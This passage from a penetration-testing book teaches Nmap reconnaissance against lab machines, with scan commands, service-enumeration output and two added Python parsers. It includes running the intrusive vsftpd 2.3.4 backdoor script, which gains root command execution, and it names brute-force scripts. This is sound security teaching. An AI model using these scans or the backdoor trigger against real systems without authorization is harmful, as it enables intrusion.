nmap -sU -p 1-1024 192.168.25.129 

Starting Nmap 7.60 ( https://nmap.org ) at 2018-09-17 21:52 IST 
Warning: 192.168.25.129 giving up on port because retransmission cap hit (10). 
... 
137/udp  ...  netbios-ns 
138/udp  ...  netbios-dgm 
... 
MAC Address: 00:0C:29:11:8E:B1 (VMware) 

Nmap done: 1 IP address (1 host up) scanned in 1225.65 seconds 


Figure 1-14. Output of basic NMAP UDP scan done on a single IP 
address 


OS Detection 


Here's the command: 

nmap -O <target IP address> 


Now that you know how to probe for open ports and enumerate services, you 
can go further and use NMAP to detect the operating system the target is 
running. You can use the command nmap -O <target IP address> (capital 
letter O). OS detection sends a series of specially crafted TCP, UDP, and 
ICMP probes and compares the responses against NMAP's fingerprint 
database; it requires raw packet privileges (root) and is most reliable 
when the target has at least one open and one closed TCP port. Figure 1-15 
shows the output of an NMAP operating system detection probe. You can see 
that the target is running Linux with a 2.6.x kernel (NMAP narrows it to 
the range 2.6.9 to 2.6.33) and reports the matching CPE identifier 
cpe:/o:linux:linux_kernel:2.6. 
nmap -O 192.168.25.129 

Starting Nmap 7.60 ( https://nmap.org ) at 2018-09-17 14:53 IST 
Nmap scan report for 192.168.25.129 
Host is up. 
Not shown: 977 closed ports 
PORT     STATE SERVICE 
... 
139/tcp  open  netbios-ssn 
445/tcp  open  microsoft-ds 
512/tcp  open  exec 
513/tcp  open  login 
514/tcp  open  shell 
1099/tcp open  rmiregistry 
1524/tcp open  ingreslock 
2049/tcp open  nfs 
2121/tcp open  ccproxy-ftp 
3306/tcp open  mysql 
5432/tcp open  postgresql 
5900/tcp open  vnc 
6000/tcp open  X11 
6667/tcp open  irc 
8009/tcp open  ajp13 
8180/tcp open  unknown 
MAC Address: 00:0C:29:11:8E:B1 (VMware) 
... 
OS CPE: cpe:/o:linux:linux_kernel:2.6 
OS details: Linux 2.6.9 - 2.6.33 
Network Distance: 1 hop 

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 2.16 seconds 


Figure 1-15. Output of NMAP OS detection scan done on a single IP 
address 


Intense Scan 


Here's the command: 

nmap -T4 -A -v <target IP address> 


So far, you have used NMAP for individual tasks such as port scanning, 
service enumeration, and OS detection. However, it is possible to perform 
all of these with a single command. ZENMAP's Intense scan profile runs 
nmap -T4 -A -v: -A enables OS detection, version detection, script 
scanning with the default set of NMAP scripts, and traceroute; -T4 uses 
aggressive timing; and -v prints progress as the scan runs. Simply set 
your target IP address and select the Intense scan profile. Because -A 
runs scripts that interact with the services it finds, this is the 
noisiest scan in this chapter. Figure 1-16 shows part of the output of an 
intense scan that not only identified an FTP server (vsftpd 2.3.4) but, 
through the ftp-anon script, also found that anonymous FTP login is 
allowed. 
PORT   STATE SERVICE VERSION 
21/tcp open  ftp     vsftpd 2.3.4 
|_ftp-anon: Anonymous FTP login allowed (FTP code 230) 
... 


Figure 1-16. Output of intense NMAP scan done on a single IP address 
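Reading results off the screen, as in Figures 1-13 and 1-16, does not scale past a handful of hosts. NMAP's -oX - option writes its XML report to standard output, which is the right interface for the "Invoking NMAP from Python" capability listed at the start of this chapter. The following Python code is an added example, not code from the book or from NMAP: it builds the nmap command line, runs it (only in run_nmap(), which requires nmap to be installed and, for raw-packet scans, root), and parses the XML into host and port records, including service versions and NMAP script output such as the ftp-anon result above. SAMPLE_XML is a hand-constructed report in the shape NMAP 7.x emits, populated with the Metasploitable results from this chapter, so the parser can be exercised offline.

```python
"""Drive Nmap from Python and parse its XML report.

Added example, not code from the book or from Nmap: `nmap -oX -` writes the
machine-readable XML report to stdout, which is far easier to consume than
the screen output in the figures.  SAMPLE_XML is constructed by hand in the
shape Nmap 7.x emits (ports, services, NSE script results, OS match) for
the Metasploitable host scanned in this chapter; run_nmap() is the only
function that touches the network.
"""
import shutil
import subprocess
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field
from typing import Dict, List, Sequence

SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -T4 -A -v -oX - 192.168.25.129" version="7.60">
  <host>
    <status state="up" reason="arp-response"/>
    <address addr="192.168.25.129" addrtype="ipv4"/>
    <address addr="00:0C:29:11:8E:B1" addrtype="mac" vendor="VMware"/>
    <ports>
      <extraports state="closed" count="977"><extrareasons reason="resets" count="977"/></extraports>
      <port protocol="tcp" portid="21">
        <state state="open" reason="syn-ack" reason_ttl="64"/>
        <service name="ftp" product="vsftpd" version="2.3.4" method="probed" conf="10"/>
        <script id="ftp-anon" output="Anonymous FTP login allowed (FTP code 230)"/>
      </port>
      <port protocol="tcp" portid="80">
        <state state="open" reason="syn-ack" reason_ttl="64"/>
        <service name="http" product="Apache httpd" version="2.2.8" method="probed" conf="10"/>
        <script id="http-methods" output="&#10;  Supported Methods: GET HEAD POST OPTIONS"/>
      </port>
      <port protocol="udp" portid="161">
        <state state="open|filtered" reason="no-response" reason_ttl="0"/>
        <service name="snmp" method="table" conf="3"/>
      </port>
    </ports>
    <os><osmatch name="Linux 2.6.9 - 2.6.33" accuracy="100"/></os>
  </host>
  <runstats><finished elapsed="13.89"/><hosts up="1" down="0" total="1"/></runstats>
</nmaprun>
"""


@dataclass
class Port:
    proto: str
    number: int
    state: str
    reason: str
    service: str
    version: str
    scripts: Dict[str, str] = field(default_factory=dict)  # script id -> output


@dataclass
class Host:
    address: str
    mac: str
    os_match: str
    ports: List[Port] = field(default_factory=list)


def build_command(targets: Sequence[str], extra: Sequence[str] = ("-sV",)) -> List[str]:
    """argv for an Nmap run whose XML report comes back on stdout."""
    return ["nmap", *extra, "-oX", "-", *targets]


def parse_report(xml_text: str) -> List[Host]:
    """Turn an Nmap XML report into Host/Port records (hosts that are up only)."""
    root = ET.fromstring(xml_text)
    hosts: List[Host] = []
    for h in root.iter("host"):
        status = h.find("status")
        if status is None or status.get("state") != "up":
            continue
        addrs = {a.get("addrtype"): a.get("addr") for a in h.findall("address")}
        osmatch = h.find("os/osmatch")  # first (best) match, if OS detection ran
        host = Host(addrs.get("ipv4") or addrs.get("ipv6", "?"), addrs.get("mac", ""),
                    osmatch.get("name", "") if osmatch is not None else "")
        for p in h.findall("ports/port"):
            st = p.find("state")
            svc = p.find("service")
            version = " ".join(x for x in (svc.get("product"), svc.get("version")) if x) if svc is not None else ""
            host.ports.append(Port(
                proto=p.get("protocol"), number=int(p.get("portid")),
                state=st.get("state"), reason=st.get("reason"),
                service=svc.get("name", "") if svc is not None else "",
                version=version,
                scripts={s.get("id"): (s.get("output") or "").strip() for s in p.findall("script")},
            ))
        hosts.append(host)
    return hosts


def open_ports(host: Host, proto: str = "tcp") -> List[Port]:
    """Ports reported plainly 'open' (the ambiguous 'open|filtered' is excluded)."""
    return [p for p in host.ports if p.proto == proto and p.state == "open"]


def script_findings(host: Host, script_id: str) -> Dict[int, str]:
    """Port number -> output for every port where the given NSE script reported something."""
    return {p.number: p.scripts[script_id] for p in host.ports if script_id in p.scripts}


def run_nmap(targets: Sequence[str], extra: Sequence[str] = ("-sV",)) -> List[Host]:
    """Run Nmap (must be on PATH; raw-packet scans need root) and parse its XML."""
    if shutil.which("nmap") is None:
        raise RuntimeError("nmap not found on PATH")
    proc = subprocess.run(build_command(targets, extra), capture_output=True, text=True, check=True)
    return parse_report(proc.stdout)


if __name__ == "__main__":
    for host in parse_report(SAMPLE_XML):
        print(host.address, host.mac, host.os_match)
        for p in open_ports(host):
            print(f"  {p.number}/{p.proto} {p.service} {p.version} ({p.reason})")
        print("  ftp-anon:", script_findings(host, "ftp-anon"))
```

Because the verdict for each port is an attribute rather than a column to be parsed, this is also the form in which to diff two scans of the same scope (a new open port or a changed version between runs is a one-line set comparison on the Port records), which is how you turn a one-off scan into a check you can repeat during an engagement.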


NMAP Scripts 


NMAP has long evolved from a basic port scanner. It is far more powerful 
and flexible than just a port scanner. NMAP's functionality can be 
extended using NMAP scripts. The NMAP scripting engine is capable of 
executing scripts allowing in-depth target enumeration and information 
gathering. NMAP has about 600 scripts serving different purposes. In 
Kali Linux, the scripts can be found at /usr/share/nmap/scripts. The 
next section will discuss how you can use NMAP scripts for enumerating 
various TCP services. 


HTTP Enumeration 


HTTP is a common service found on many hosts. It runs on port 80 by 
default. NMAP has a script for enumerating HTTP services, http-enum, which 
requests a list of commonly used paths and reports the ones that exist. It 
can be invoked using the command nmap --script http-enum <target IP 
address>. Figure 1-17 shows the output of the http-enum script. It lists 
various interesting directories and files on the web server (a phpMyAdmin 
installation, a phpinfo.php page, directories with listings enabled, and 
candidate admin pages on port 8180) that may be useful for building 
further attacks. 


nmap --script http-enum 192.168.25.129 

... 
80/tcp   open  http 
| http-enum: 
|   /tikiwiki/: Tikiwiki 
|   /test/: Test page 
|   /phpinfo.php: Possible information file 
|   /phpMyAdmin/: phpMyAdmin 
|   /doc/: Potentially interesting directory w/ listing on 'apache/2.2.8 (ubuntu) dav/2' 
|   /icons/: Potentially interesting folder w/ directory listing 
|_  /index/: Potentially interesting folder 
111/tcp  open  rpcbind 
139/tcp  open  netbios-ssn 
445/tcp  open  microsoft-ds 
512/tcp  open  exec 
513/tcp  open  login 
514/tcp  open  shell 
1099/tcp open  rmiregistry 
1524/tcp open  ingreslock 
2049/tcp open  nfs 
2121/tcp open  ccproxy-ftp 
3306/tcp open  mysql 
5432/tcp open  postgresql 
5900/tcp open  vnc 
6000/tcp open  X11 
6667/tcp open  irc 
8009/tcp open  ajp13 
8180/tcp open  unknown 
| http-enum: 
|   /admin/: Possible admin folder 
|   /admin/index.html: Possible admin folder 
|   /admin/login.html: Possible admin folder 
|   /admin/admin.html: Possible admin folder 
|   /admin/account.html: Possible admin folder 
|   /admin/admin_login.html: Possible admin folder 
|   /admin/home.html: Possible admin folder 
|   /admin/admin-login.html: Possible admin folder 
|   /admin/adminLogin.html: Possible admin folder 
|   /admin/controlpanel.html: Possible admin folder 
|   /admin/cp.html: Possible admin folder 
|   /admin/index.jsp: Possible admin folder 
|   /admin/login.jsp: Possible admin folder 
|   /admin/admin.jsp: Possible admin folder 
|   /admin/home.jsp: Possible admin folder 
|   /admin/controlpanel.jsp: Possible admin folder 
|   /admin/admin-login.jsp: Possible admin folder 
|   /admin/cp.jsp: Possible admin folder 
|   /admin/account.jsp: Possible admin folder 
|   /admin/admin_login.jsp: Possible admin folder 
... 


Figure 1-17. Output of NMAP script http-enum executed against 
target IP address 
HTTP Methods 


HTTP supports the use of various methods such as GET, POST, PUT, DELETE, TRACE, 
and so on. Sometimes methods that a site does not need are left enabled on the 
web server unnecessarily: PUT and DELETE may allow uploading or removing content, 
and TRACE can assist cross-site tracing attacks. You can use the NMAP script 
http-methods, as shown in Figure 1-18, to enumerate the HTTP methods allowed on 
the target system. The script reports what the server answers to an OPTIONS 
request and flags methods it considers risky; in the figure the server on the 
target offers only GET, HEAD, POST, and OPTIONS. Because an OPTIONS response 
may be incomplete, the script argument http-methods.test-all makes the script 
try each method instead of trusting the advertised list. 


[Figure 1-18 screenshot: Zenmap, Command: nmap --script http-methods 192.168.25.129. 
Recovered output:] 
Starting Nmap 7.60 ( https://nmap.org ) at 2018-09-28 12:22 IST 
Nmap scan report for 192.168.25.129 
Host is up (0.00245s latency). 
Not shown: 977 closed ports 
PORT     STATE SERVICE 
21/tcp   open  ftp 
22/tcp   open  ssh 
23/tcp   open  telnet 
25/tcp   open  smtp 
53/tcp   open  domain 
80/tcp   open  http 
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS 
111/tcp  open  rpcbind 
139/tcp  open  netbios-ssn 
445/tcp  open  microsoft-ds 
512/tcp  open  exec 
513/tcp  open  login 
514/tcp  open  shell 
1099/tcp open  rmiregistry 
1524/tcp open  ingreslock 
2049/tcp open  nfs 
2121/tcp open  ccproxy-ftp 
3306/tcp open  mysql 
5432/tcp open  postgresql 
5900/tcp open  vnc 
6000/tcp open  X11 
6667/tcp open  irc 
8009/tcp open  ajp13 
8180/tcp open  unknown 
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS 
MAC Address: 00:0C:29:11:8E:B1 (VMware) 

Nmap done: 1 IP address (1 host up) scanned in 2.30 seconds 
Figure 1-18. Output of NMAP script http-methods executed against a 
target IP address 
The following are some additional NMAP scripts for HTTP enumeration: 
• http-title 
• http-method-tamper 
• http-trace 
• http-fetch 
• http-wordpress-enum 
• http-devframework 
• the http NSE library, which these scripts build on 


SMB Enumeration 


Server Message Block (SMB) is a protocol extensively used for network file 
and printer sharing, mainly on Windows but also on Linux through Samba. SMB 
commonly runs on port 445 (the older NetBIOS-over-TCP transport uses port 139). 
So, if you find a target with port 445 open, you can enumerate it further using 
NMAP scripts. Invoke the SMB OS discovery script with the command nmap -p 445 
--script smb-os-discovery <target IP address>. The -p 445 parameter restricts 
the scan to port 445, so the script runs only against that port. The script 
output shown in Figure 1-19 gives you the OS (for Samba, including the Samba 
version), the computer name, the NetBIOS name, and the workgroup or domain of 
the target. 


[Figure 1-19 screenshot: Zenmap, nmap -p 445 --script smb-os-discovery 192.168.25.129. 
Only fragments survive extraction: "Starting Nmap 7.60 ( https://nmap.org ) ... 15:30 IST", 
"Nmap scan report for 192.168.25.129", the port line "445/tcp open microsoft-ds", 
"MAC Address: 00:0C:29:11:8E:B1 (VMware)" and "Nmap done: 1 IP address (1 host up) 
scanned in 6.52 seconds". The smb-os-discovery block itself is not legible.] 
Figure 1-19. Output of NMAP script smb-os-discovery executed 
against a target IP address 
Another useful NMAP script is smb-enum-shares, as shown in Figure 1-20. 
It lists the SMB shares on the target system together with each share's type, 
comment, and the access granted to anonymous connections and to the account 
the script authenticated with (guest in the figure). Shares that grant READ or 
READ/WRITE to anonymous or guest, such as IPC$ and SharedDocs in Figure 1-20, 
are the ones to inspect first. 


[Figure 1-20 screenshot: Zenmap, Command: nmap --script smb-enum-shares 192.168.25.130. 
Recovered output:] 
Host is up (0.00185s latency). 
Not shown: 991 closed ports 
PORT     STATE SERVICE 
21/tcp   open  ftp 
25/tcp   open  smtp 
110/tcp  open  pop3 
135/tcp  open  msrpc 
139/tcp  open  netbios-ssn 
143/tcp  open  imap 
445/tcp  open  microsoft-ds 
587/tcp  open  submission 
3389/tcp open  ms-wbt-server 
MAC Address: 00:0C:29:03:42:64 (VMware) 

Host script results: 
| smb-enum-shares: 
|   account_used: guest 
|   \\192.168.25.130\ADMIN$: 
|     Type: STYPE_DISKTREE_HIDDEN 
|     Comment: Remote Admin 
|     Anonymous access: <none> 
|     Current user access: <none> 
|   \\192.168.25.130\C$: 
|     Type: STYPE_DISKTREE_HIDDEN 
|     Comment: Default share 
|     Anonymous access: <none> 
|     Current user access: <none> 
|   \\192.168.25.130\IPC$: 
|     Type: STYPE_IPC_HIDDEN 
|     Comment: Remote IPC 
|     Anonymous access: READ 
|     Current user access: READ/WRITE 
|   \\192.168.25.130\SharedDocs: 
|     Type: STYPE_DISKTREE 
|     Comment: 
|     Anonymous access: <none> 
|     Current user access: READ/WRITE 
|   \\192.168.25.130\s: 
|     Type: STYPE_DISKTREE 
|     Comment: 
|     Anonymous access: <none> 
|_    Current user access: READ/WRITE 

Nmap done: 1 IP address (1 host up) scanned in 2.28 seconds 
Figure 1-20. Output of NMAP script smb-enum-shares executed 
against target IP address 
The following are some additional NMAP scripts for SMB enumeration: 
• smb-vuln-ms17-010 
• smb-protocols 
• smb-mbenum 
• smb-enum-users 
• smb-enum-processes 
• smb-enum-services 


DNS Enumeration 


The Domain Name System (DNS) is the backbone of the Internet: it does the 
crucial job of translating host names to IP addresses and vice versa. It runs 
on port 53 by default (UDP for ordinary queries, TCP for zone transfers and 
large responses). Enumerating a DNS server can give a lot of interesting and 
useful information, such as the server software version, whether it answers 
recursive queries for anyone, and whether it allows zone transfers. NMAP has 
several scripts for enumerating a DNS service. Figure 1-21 shows the output of 
nmap -p 53 -A -v against the target: the -A option enables version detection, 
OS detection, traceroute, and the default scripts, so the dns-nsid script runs 
without being named and reveals the BIND version (9.4.2). The OS fingerprint 
warning in the figure appears because only one port was scanned; OS detection 
needs at least one open and one closed port to be reliable. 


[Figure 1-21 screenshot: Zenmap, Command: nmap -p 53 -A -v 192.168.25.129. 
Recovered output:] 
Nmap scan report for 192.168.25.129 
Host is up (0.0013s latency). 

PORT   STATE SERVICE VERSION 
53/tcp open  domain  ISC BIND 9.4.2 
| dns-nsid: 
|_  bind.version: 9.4.2 
MAC Address: 00:0C:29:11:8E:B1 (VMware) 
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port 
Device type: general purpose 
Running: Linux 2.6.X 
OS CPE: cpe:/o:linux:linux_kernel:2.6 
OS details: Linux 2.6.9 - 2.6.33 
Uptime guess: 0.009 days (since Wed Oct 3 14:40:38 2018) 
Network Distance: 1 hop 
TCP Sequence Prediction: Difficulty=203 (Good luck!) 
IP ID Sequence Generation: All zeros 

TRACEROUTE 
HOP RTT     ADDRESS 
1   1.26 ms 192.168.25.129 

NSE: Script Post-scanning. 
Initiating NSE at 14:53 
Completed NSE at 14:53, 0.00s elapsed 
Initiating NSE at 14:53 
Completed NSE at 14:53, 0.00s elapsed 
Read data files from: /usr/bin/../share/nmap 
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 17.00 seconds 
           Raw packets sent: 21 (1.670KB) | Rcvd: 17 (1.382KB) 
Figure 1-21. Output of DNS enumeration executed against a target 
IP address 
The following are some additional NMAP scripts for DNS enumeration: 
• dns-cache-snoop 
• dns-service-discovery 
• dns-recursion 
• dns-brute 
• dns-zone-transfer 
• dns-nsid 
• dns-nsec-enum 
• dns-fuzz 
• dns-srv-enum 


FTP Enumeration 


File Transfer Protocol (FTP) is one of the oldest protocols for transferring 
files between systems and is still commonly found. It runs on port 21 by 
default and, unless wrapped in TLS (FTPS), carries credentials and data in 
clear text. NMAP has multiple scripts for enumerating the FTP service. 
Figure 1-22 shows the output of two of them, run together as nmap --script 
ftp-syst,ftp-anon <target IP address> (the figure passes --script twice, 
which NMAP also accepts): 
• ftp-syst 
• ftp-anon 

The ftp-syst output shows the server's STAT response, including the vsFTPd 
2.3.4 version string and the fact that both the control and the data 
connections are plain text; ftp-anon reveals that the server is accepting 
anonymous logins (FTP code 230). 
[Figure 1-22 screenshot: Zenmap, Command: nmap --script ftp-syst 192.168.25.129 --script ftp-anon. 
Recovered output:] 
Starting Nmap 7.60 ( https://nmap.org ) at 2018-09-19 16:04 IST 
Nmap scan report for 192.168.25.129 
Host is up (0.00069s latency). 
Not shown: 977 closed ports 
PORT     STATE SERVICE 
21/tcp   open  ftp 
|_ftp-anon: Anonymous FTP login allowed (FTP code 230) 
| ftp-syst: 
|   STAT: 
| FTP server status: 
|      Connected to 192.168.25.128 
|      Logged in as ftp 
|      TYPE: ASCII 
|      No session bandwidth limit 
|      Session timeout in seconds is 300 
|      Control connection is plain text 
|      Data connections will be plain text 
|      vsFTPd 2.3.4 - secure, fast, stable 
|_End of status 
22/tcp   open  ssh 
23/tcp   open  telnet 
25/tcp   open  smtp 
53/tcp   open  domain 
80/tcp   open  http 
(the remaining open ports, 111 through 8180, are the same as in Figure 1-18) 
MAC Address: 00:0C:29:11:8E:B1 (VMware) 

Nmap done: 1 IP address (1 host up) scanned in 1.76 seconds 
Figure 1-22. Output of NMAP scripts ftp-syst and ftp-anon executed 
against a target IP address 


Since the target is running vsftpd 2.3.4, you can try another NMAP script 
that checks whether this particular FTP server is vulnerable: ftp-vsftpd-backdoor, 
as shown in Figure 1-23. Be aware that this script belongs to the exploit and 
intrusive categories. It does not merely compare version strings; it triggers 
the backdoor and runs the shell command id on the target (visible under 
"Exploit results" in the figure), so run it only against systems you are 
authorized to exploit. 
[Figure 1-23 screenshot: Zenmap, Command: nmap --script ftp-vsftpd-backdoor 192.168.25.129. 
Recovered output:] 
Not shown: 977 closed ports 
PORT     STATE SERVICE 
21/tcp   open  ftp 
| ftp-vsftpd-backdoor: 
|   VULNERABLE: 
|   vsFTPd version 2.3.4 backdoor 
|     State: VULNERABLE (Exploitable) 
|     IDs:  OSVDB:73573  CVE:CVE-2011-2523 
|       vsFTPd version 2.3.4 backdoor, this was reported on 2011-07-04. 
|     Disclosure date: 2011-07-03 
|     Exploit results: 
|       Shell command: id 
|       Results: uid=0(root) gid=0(root) 
|     References: 
|       http://osvdb.org/73573 
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523 
|       https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb 
|_      http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html 
22/tcp   open  ssh 
23/tcp   open  telnet 
25/tcp   open  smtp 
53/tcp   open  domain 
80/tcp   open  http 
(the remaining open ports, 111 through 8180, are the same as in Figure 1-18) 
MAC Address: 00:0C:29:11:8E:B1 (VMware) 

Nmap done: 1 IP address (1 host up) scanned in 2.88 seconds 
Figure 1-23. Output of NMAP script ftp-vsftpd-backdoor executed 
against a target IP address 


The result shows that the FTP server is vulnerable (CVE-2011-2523, the 
backdoored vsftpd 2.3.4 download); you'll learn how to exploit it later in 
this book. 
The following are some additional NMAP scripts for FTP enumeration: 
• ftp-brute 
• the ftp NSE library, which the FTP scripts build on 
• ftp-bounce 
• ftp-vuln-cve2010-4221 
• ftp-libopie 
MySQL Enumeration 


MySQL is one of the most popular open source relational database 
management systems. It runs on port 3306 by default. NMAP has scripts for 
enumerating the MySQL service, and the information they reveal can be used 
to attack the target database further. Figure 1-24 shows the output of the 
mysql-info script: it reports the protocol version, the server version, the 
thread ID, the capability flags, the server status, and the authentication 
salt that the server sends in its greeting. 


Figure 1-24. Output of NMAP script mysql-info executed against a 
target IP address 


The following are some additional NMAP scripts for MySQL enumeration: 
e mysql-databases 
e mysql-enum 
e mysql-brute 
e mysql-query 
e mysql-empty-password 
e mysql-vuln-cve2012-2122 
e mysql-users 
e mysql-variables 
SSH Enumeration 


The Secure Shell (SSH) protocol is widely used for secure remote logins 
and administration. Unlike Telnet, SSH encrypts the traffic, making the 
communication secure. It runs on port 22 by default. NMAP has scripts for 
enumerating the SSH service. Figure 1-25 shows the output of the ssh2-enum-algos 
script. It lists the key exchange, host key, encryption, MAC, and compression 
algorithms that the target SSH server offers. This list is worth reading 
closely: the server in the figure still offers diffie-hellman-group1-sha1 key 
exchange, ssh-dss host keys, CBC-mode and arcfour ciphers, and MD5-based MACs, 
all of which are disabled by default or removed in current OpenSSH releases. 
That matches the old OpenSSH 4.7p1 build the banner reveals later in 
Figure 1-29. 


[Figure 1-25 screenshot: Zenmap, Command: nmap --script ssh2-enum-algos 192.168.25.129. 
Recovered output:] 
Starting Nmap 7.60 ( https://nmap.org ) at 2018-09-19 15:24 IST 
Nmap scan report for 192.168.25.129 
Host is up (0.0065s latency). 
Not shown: 977 closed ports 
PORT   STATE SERVICE 
21/tcp open  ftp 
22/tcp open  ssh 
| ssh2-enum-algos: 
|   kex_algorithms: (4) 
|       diffie-hellman-group-exchange-sha256 
|       diffie-hellman-group-exchange-sha1 
|       diffie-hellman-group14-sha1 
|       diffie-hellman-group1-sha1 
|   server_host_key_algorithms: (2) 
|       ssh-rsa 
|       ssh-dss 
|   encryption_algorithms: (13) 
|       aes128-cbc 
|       3des-cbc 
|       blowfish-cbc 
|       cast128-cbc 
|       arcfour128 
|       arcfour256 
|       arcfour 
|       aes192-cbc 
|       aes256-cbc 
|       rijndael-cbc@lysator.liu.se 
|       aes128-ctr 
|       aes192-ctr 
|       aes256-ctr 
|   mac_algorithms: (7) 
|       hmac-md5 
|       hmac-sha1 
|       umac-64@openssh.com 
|       hmac-ripemd160 
|       hmac-ripemd160@openssh.com 
|       hmac-sha1-96 
|       hmac-md5-96 
|   compression_algorithms: (2) 
|       none 
|_      zlib@openssh.com 
Figure 1-25. Output of NMAP script ssh2-enum-algos executed 
against a target IP address 
The following are some additional NMAP scripts for SSH enumeration: 
• ssh-brute 
• ssh-auth-methods 
• ssh-run 
• ssh-hostkey 
• sshv1 
• ssh-publickey-acceptance 
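Reading an ssh2-enum-algos listing by eye works for one host; across a network 
it is better scripted. The following Python is an added example, not code from 
the book or from the NMAP project. It parses the text block that ssh2-enum-algos 
prints (the sample is the Figure 1-25 output retyped by hand), flags algorithms 
that match a set of weak-algorithm patterns, and reports what remains once the 
weak ones are removed; an empty remainder in any section means the server 
offers nothing acceptable there. The WEAK patterns are the policy chosen for 
this example, not an NMAP or OpenSSH list, so adjust them to your own standard.

```python
"""Triage the algorithm lists reported by the ssh2-enum-algos NSE script."""
import re
from collections import defaultdict

# Constructed sample: the ssh2-enum-algos block from Figure 1-25, retyped by hand.
SAMPLE = """\
| ssh2-enum-algos:
|   kex_algorithms: (4)
|       diffie-hellman-group-exchange-sha256
|       diffie-hellman-group-exchange-sha1
|       diffie-hellman-group14-sha1
|       diffie-hellman-group1-sha1
|   server_host_key_algorithms: (2)
|       ssh-rsa
|       ssh-dss
|   encryption_algorithms: (13)
|       aes128-cbc
|       3des-cbc
|       blowfish-cbc
|       cast128-cbc
|       arcfour128
|       arcfour256
|       arcfour
|       aes192-cbc
|       aes256-cbc
|       rijndael-cbc@lysator.liu.se
|       aes128-ctr
|       aes192-ctr
|       aes256-ctr
|   mac_algorithms: (7)
|       hmac-md5
|       hmac-sha1
|       umac-64@openssh.com
|       hmac-ripemd160
|       hmac-ripemd160@openssh.com
|       hmac-sha1-96
|       hmac-md5-96
|   compression_algorithms: (2)
|       none
|_      zlib@openssh.com
"""

# Regular expressions for algorithms to flag, per section. Policy choice of this
# example (SHA-1 key exchange, DSA host keys, CBC/RC4/3DES ciphers, MD5, truncated
# and RIPEMD MACs); tune to the standard you audit against.
WEAK = {
    "kex_algorithms": [r"sha1$"],
    "server_host_key_algorithms": [r"^ssh-dss$"],
    "encryption_algorithms": [r"-cbc", r"^arcfour", r"^3des"],
    "mac_algorithms": [r"md5", r"-96$", r"ripemd160"],
}

SECTION_RE = re.compile(r"^(\w+): \(\d+\)$")


def parse_enum_algos(text):
    """Return {section: [algorithm, ...]} from ssh2-enum-algos script output."""
    sections = defaultdict(list)
    current = None
    for raw in text.splitlines():
        line = raw.lstrip("|_ ").strip()      # drop NSE's "| " / "|_" prefixes
        if not line or line.startswith("ssh2-enum-algos"):
            continue
        m = SECTION_RE.match(line)
        if m:
            current = m.group(1)
            continue
        if current is not None:
            sections[current].append(line)
    return dict(sections)


def weak_algorithms(sections):
    """Return {section: [weak algorithm, ...]} for entries matching WEAK patterns."""
    findings = {}
    for section, patterns in WEAK.items():
        hits = [a for a in sections.get(section, [])
                if any(re.search(p, a) for p in patterns)]
        if hits:
            findings[section] = hits
    return findings


def strong_only(sections):
    """Algorithms left in each section once the weak ones are removed. An empty
    list means clients cannot negotiate an acceptable algorithm in that section."""
    weak = weak_algorithms(sections)
    return {s: [a for a in algos if a not in weak.get(s, [])]
            for s, algos in sections.items()}


if __name__ == "__main__":
    parsed = parse_enum_algos(SAMPLE)
    for section, algos in weak_algorithms(parsed).items():
        print("%s: %d weak of %d -> %s" % (section, len(algos), len(parsed[section]), algos))
    print("acceptable:", strong_only(parsed))
```

Feed it the script output of a real scan (nmap --script ssh2-enum-algos -oN - <target>), or the "output" attribute of the ssh2-enum-algos script element in -oX XML, which carries the same text.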


SMTP Enumeration 


Simple Mail Transfer Protocol (SMTP) is used for the transmission of 
electronic mail. It runs on port 25 by default (587 is used for mail 
submission and 465 for SMTP over implicit TLS). NMAP has several scripts 
for enumerating the SMTP service. These scripts can reveal weaknesses in 
the SMTP server such as open relays, user enumeration through the VRFY and 
EXPN commands, and acceptance of arbitrary commands. Figure 1-26 shows the 
output of the smtp-commands script. It lists the commands and extensions 
that the target SMTP server advertises in its EHLO response. 
[Figure 1-26 screenshot: Zenmap, Command: nmap --script smtp-commands 192.168.25.129. 
Recovered output:] 
Starting Nmap 7.60 ( https://nmap.org ) at 2018-09-19 15:20 IST 
Nmap scan report for 192.168.25.129 
Host is up (0.00265s latency). 
Not shown: 977 closed ports 
PORT     STATE SERVICE 
21/tcp   open  ftp 
22/tcp   open  ssh 
23/tcp   open  telnet 
25/tcp   open  smtp 
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
53/tcp   open  domain 
80/tcp   open  http 
(the remaining open ports, 111 through 8180, are the same as in Figure 1-18) 
MAC Address: 00:0C:29:11:8E:B1 (VMware) 

Nmap done: 1 IP address (1 host up) scanned in 1.82 seconds 
Figure 1-26. Output of NMAP script smtp-commands executed 
against a target IP address 


Many SMTP servers are mistakenly configured as open relays: they accept mail 
from anyone, without authentication, for delivery to arbitrary external 
addresses. Spammers abuse such servers, and the server's address ends up on 
blacklists, so this is indeed a critical flaw. NMAP has a script called 
smtp-open-relay that checks whether the target SMTP server relays by trying 
16 combinations of sender and recipient address formats, as shown in 
Figure 1-27. In this case all tests failed, so the server does not appear to 
be an open relay. 
[Figure 1-27 screenshot: Zenmap, Command: nmap --script smtp-open-relay 192.168.25.129. 
Recovered output:] 
Starting Nmap 7.60 ( https://nmap.org ) at 2018-09-28 12:40 IST 
Nmap scan report for 192.168.25.129 
Host is up (0.0053s latency). 
Not shown: 977 closed ports 
PORT     STATE SERVICE 
21/tcp   open  ftp 
22/tcp   open  ssh 
23/tcp   open  telnet 
25/tcp   open  smtp 
|_smtp-open-relay: Server doesn't seem to be an open relay, all tests failed 
53/tcp   open  domain 
80/tcp   open  http 
(the remaining open ports, 111 through 8180, are the same as in Figure 1-18) 
MAC Address: 00:0C:29:11:8E:B1 (VMware) 

Nmap done: 1 IP address (1 host up) scanned in 19.19 seconds 
Figure 1-27. Output of NMAP script smtp-open-relay executed 
against a target IP address 


